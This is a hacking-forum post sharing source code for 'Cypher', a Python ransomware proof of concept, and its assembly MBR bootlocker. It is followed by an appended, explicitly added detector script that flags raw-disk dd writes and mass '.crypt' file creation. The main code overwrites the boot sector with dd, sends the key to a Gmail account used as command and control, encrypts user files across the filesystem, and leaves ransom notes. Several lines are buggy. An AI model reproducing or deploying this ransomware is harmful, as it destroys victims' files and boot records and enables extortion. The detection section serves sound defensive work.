Python based Ransomware. #1
Ethics of authoring malware aside, I think it is an interesting subject. As such I have a project in development that is basically a ransomware. Now I have never written one of these before, so some improvements may be needed.

I decided to call my malware Cypher.

Cypher is a proof of concept ransomware which implements the PyCrypto module and uses Gmail (currently) as a sort of command and control server. It is a work in progress as of yet and I will be releasing updates periodically depending on the amount of time I have to work on the project. The general idea is that the personal files get encrypted and the boot sector gets overwritten with a custom bootloader. As of yet I am looking into writing the bootlocker directly to disk, since at the moment I am just calling `dd` from within the script.

Code:
# Cypher is a work in progress, as such this is an Alpha release of the encryption
# module, for reporting bugs feel free to open an issue or should you wish to
# collaborate on this, pull requests are welcomed as well.

import os
import sys
import random
import struct
import smtplib
import string
import datetime
import time

import getpass as gp

from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from multiprocessing import Pool


# Function to generate our client ID
def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))


ID = gen_client_ID(12)
key = RSA.generate(2048)
exKey = RSA.exportKey('PEM')

# Check to see if we're on linux and have root, if so use dd to override the MBR with our bootlocker.
if sys.platform == 'linux2' and gp.getuser() == 'root':
    try:
        os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
        pass    
else:            
    try:
        os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
        pass



def send_ID_Key():
    ts = datetime.datetime.now()
    SERVER = "smtp.gmail.com"         
    PORT = 587                         
    USER= "address@gmail.com"        # Specify Username Here
    PASS= "prettyflypassword"        # Specify Password Here
    FROM = USER
    TO = ["address@gmail.com"]         
    SUBJECT = "Ransomware data: "+str(ts)
    MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
    message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
    try:              
        server = smtplib.SMTP()
        server.connect(SERVER, PORT)
        server.starttls()
        server.login(USER, PASS)
        server.sendmail(FROM, TO, message)
        server.quit()
    except Exception as e:
        # print e
        pass
    


def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):

    if not out_filename:
        out_filename = in_filename + '.crypt'

    iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    filesize = os.path.getsize(in_filename)

    with open(in_filename, 'rb') as infile:
        with open(out_filename, 'wb') as outfile:
            outfile.write(struct.pack('<Q', filesize))
            outfile.write(iv)

            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += ' ' * (16 - len(chunk) % 16)

                outfile.write(encryptor.encrypt(chunk))
                
                

def single_arg_encrypt_file(in_filename):
    encrypt_file(key, in_filename)

def select_files():
    
    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
           ".mov", ".gif", ".txt", ".py", ".pyc", ".jar"]
          
    files_to_enc = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(tuple(ext)):
                files_to_enc.push(os.path.join(root, file))

    # Parallelize execution of encryption function over four subprocesses
    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)
                

def note():
    
    readme = """
    
    .d8888b.                    888                      
    d88P  Y88b                   888                      
    888    888                   888                      
    888        888  888 88888b.  88888b.   .d88b.  888d888
    888        888  888 888 "88b 888 "88b d8P  Y8b 888P"  
    888    888 888  888 888  888 888  888 88888888 888    
    Y88b  d88P Y88b 888 888 d88P 888  888 Y8b.     888    
    "Y8888P"   "Y88888 88888P"  888  888  "Y8888  888    
                    888 888                                
             Y8b d88P 888                                
             "Y88P"  888    
    
    
    
    Hello, unfortunately all your personal files have been encrypted with millitary grade encryption and will be impossible
    to retrieve without aquiring the encryption key and decrypting binary.
    As of yet these are not available to you since the Cypher ransomware is still under construction.
    We thank you for your patience.

    Have a nice day,

    The Cypher Project."""     
    
    # Windows variant
    # outdir = os.getenv('USERNAME') + "\\Desktop"
    
    outdir = os.getenv('HOME') + "/Desktop/"
    outfile = outdir + "README"
    
    handler = open(outputfile, 'w')
    handler.write(outfile, ID)
    handler.close()
    
if __name__=="__main__":
    gen_client_ID()
    send_ID_Key()
    
    try:
        select_files()
        note()
    except Exception as e:
        pass

Bootlocker source in ASM.

Code:
[BITS 16]
[ORG 0x7C00]
MOV SI, Msg
CALL OutStr
JMP $
OutChar:
MOV AH, 0x0E
MOV BH, 0x00
MOV BL, 0x07
INT 0x10
RET
OutStr:
next_char:
MOV AL, [SI]
INC SI
OR AL, AL
JZ exit_function
CALL OutChar
JMP next_char
exit_function:
RET
Msg db 0xA, 0xD, 0xA, 0xD
   db '########################################################', 0xA, 0xD
   db '#   Your harddrive is encrypted with military grade    #', 0xA, 0xD
   db '#   encryption, you wont get your files back, since    #', 0xA, 0xD
   db '#  the Cypher ransomware is still under construction   #', 0xA, 0xD
   db '                                              ', 0xA, 0xD
   db '########################################################', 0xA, 0xD, 0xA, 0xD
   db 'Unfortunately there are only 7 days left until the encryption key is destroyed.', 0xA, 0xD, 0xA, 0xD
   db 'Have a nice day,', 0xA, 0xD
   db '     The Cypher Project', 0
TIMES 510 - ($ - $$) db 0
DW 0xAA55


The purpose of this thread would be to discuss ideas, better implementations and think about general improvements. This is a project intended for experimental and educational purposes. As such I would advise against deploying this malware in an active engagement. Thank you for your understanding.

The project's GitHub page can be found here.

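From a defender's point of view, the two behaviours the post describes are both visible in ordinary host telemetry: a `dd` invocation whose output file is a raw disk device (the boot-sector overwrite), and a single process creating a burst of files that all carry the `.crypt` suffix the encryption routine appends. The detector below is an added example written for this thread; it is not code from the post or from the Cypher project. It assumes a simplified, constructed audit feed of the form `<unix-ts> <pid> exec|create <detail>` (the sample lines are made up for the example), and it generalises the `/dev/hda` case in the post to the usual whole-disk device names.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not from the original post). Each line is
# "<unix-ts> <pid> <event> <detail>", where event is "exec" (command line)
# or "create" (path of a newly created file).
SAMPLE_LOG = """\
1476094200 4021 exec python cypher.py
1476094201 4021 exec sudo dd if=boot.bin of=/dev/hda bs=512 count=1
1476094202 4022 exec dd if=boot.bin of=/dev/hda bs=512 count=1
1476094203 4021 create /home/alice/Documents/report.docx.crypt
1476094203 4021 create /home/alice/Pictures/holiday.jpg.crypt
1476094204 4021 create /home/alice/Music/song.mp3.crypt
1476094204 4021 create /home/alice/src/main.c.crypt
1476094205 4021 create /home/alice/notes.txt.crypt
1476094206 4021 create /home/alice/Desktop/README
1476094300 5110 create /tmp/build/output.o
1476094301 5110 exec dd if=/dev/zero of=/tmp/test.img bs=1M count=10
"""

# Whole-disk block devices (not partitions): /dev/hda, /dev/sdb, /dev/vda,
# /dev/nvme0n1. The negative lookahead rejects "/dev/sda1" style partitions,
# since a boot-sector overwrite targets the disk itself.
RAW_DEVICE = re.compile(r"of=(/dev/(?:[sh]d[a-z]|vd[a-z]|nvme\d+n\d+))(?!\d)")

ENCRYPTED_SUFFIX = ".crypt"   # suffix the post's encrypt_file() appends
MASS_CREATE_THRESHOLD = 5     # assumed tuning value for the demo feed


def parse_line(line):
    """Split one telemetry line into (ts, pid, event, detail)."""
    ts, pid, event, detail = line.split(" ", 3)
    return int(ts), int(pid), event, detail


def command_name(detail):
    """Return the effective program name, looking through a leading 'sudo'."""
    argv = detail.split()
    if not argv:
        return ""
    if argv[0] == "sudo" and len(argv) > 1:
        return argv[1]
    return argv[0]


def detect(log_text, threshold=MASS_CREATE_THRESHOLD):
    """Scan the feed and return a list of alert dicts.

    Rules:
      raw-device-write          : dd writing to a whole-disk device node
      mass-encrypted-extension  : one pid creating >= threshold '.crypt' files
    """
    alerts = []
    crypt_files = defaultdict(list)  # pid -> list of .crypt paths created

    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, pid, event, detail = parse_line(line)

        if event == "exec" and command_name(detail) == "dd":
            match = RAW_DEVICE.search(detail)
            if match:
                alerts.append({
                    "rule": "raw-device-write",
                    "pid": pid,
                    "ts": ts,
                    "target": match.group(1),
                })
        elif event == "create" and detail.endswith(ENCRYPTED_SUFFIX):
            crypt_files[pid].append(detail)

    # Emit the mass-creation rule once per offending process.
    for pid, paths in crypt_files.items():
        if len(paths) >= threshold:
            alerts.append({
                "rule": "mass-encrypted-extension",
                "pid": pid,
                "count": len(paths),
                "sample": paths[:3],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The `dd` to `/tmp/test.img` from pid 5110 is deliberately included as a benign control: it is not flagged because the output is a regular file, which is the distinction the `RAW_DEVICE` pattern encodes. In a real deployment the feed would come from auditd `execve` and `open`/`creat` records or an EDR, and the threshold would be set per host role.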
Messages In This Thread
Python based Ransomware. - by VectorSEC - 10-10-2016, 10:10 AM
RE: Python based Ransomware. - by BreShiE - 10-11-2016, 12:03 AM
RE: Python based Ransomware. - by Valkyrie - 10-11-2016, 12:12 AM
RE: Python based Ransomware. - by Bish0pQ - 10-11-2016, 10:17 AM
RE: Python based Ransomware. - by VectorSEC - 11-04-2016, 06:00 AM
RE: Python based Ransomware. - by Despised - 11-04-2016, 10:06 AM
RE: Python based Ransomware. - by BadSnow - 01-09-2017, 08:34 PM
RE: Python based Ransomware. - by prankd - 01-12-2017, 08:02 PM
RE: Python based Ransomware. - by silur - 02-01-2017, 01:37 PM